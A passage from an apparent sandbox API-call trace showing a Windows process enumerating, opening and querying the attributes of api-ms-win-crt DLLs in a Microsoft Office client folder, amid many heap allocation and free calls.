Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.822] AreFileApisANSI () returned 1 [0099.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.822] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c5a8 [0099.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll") returned 79 [0099.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.824] GetFileType (hFile=0x368) returned 0x1 [0099.824] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.824] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.824] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.824] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.825] CloseHandle (hObject=0x368) returned 1 [0099.825] AreFileApisANSI () returned 1 [0099.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c8f0 [0099.825] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8c8f0, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll") returned 79 [0099.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.825] GetFileType (hFile=0x368) returned 0x1 [0099.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0099.825] CloseHandle (hObject=0x368) returned 1 [0099.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.825] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0099.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.825] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.826] AreFileApisANSI () returned 1 [0099.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0099.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8cd88 [0099.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll") returned 79 [0099.826] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-locale-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1e086ac, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1e086ac, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2365abe, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.827] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1137cdf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1137cdf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1d23858, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="APAE51~1.DLL")) returned 1 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0099.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.827] AreFileApisANSI () returned 1 [0099.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 77 [0099.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.828] AreFileApisANSI () returned 1 [0099.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0099.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll") returned 77 [0099.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.829] GetFileType (hFile=0x368) returned 0x1 [0099.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.829] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.829] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.829] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.829] CloseHandle (hObject=0x368) returned 1 [0099.829] AreFileApisANSI () returned 1 [0099.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0099.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll") returned 77 [0099.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.830] GetFileType (hFile=0x368) returned 0x1 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.830] CloseHandle (hObject=0x368) returned 1 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.831] AreFileApisANSI () returned 1 [0099.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0099.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8d0d0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll") returned 77 [0099.831] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-math-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1137cdf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1137cdf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1d23858, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0)) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.831] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.831] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1006983, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1006983, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1242d5d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x68c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="AP972F~1.DLL")) returned 1 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0099.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0099.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0099.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81b40 [0099.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: 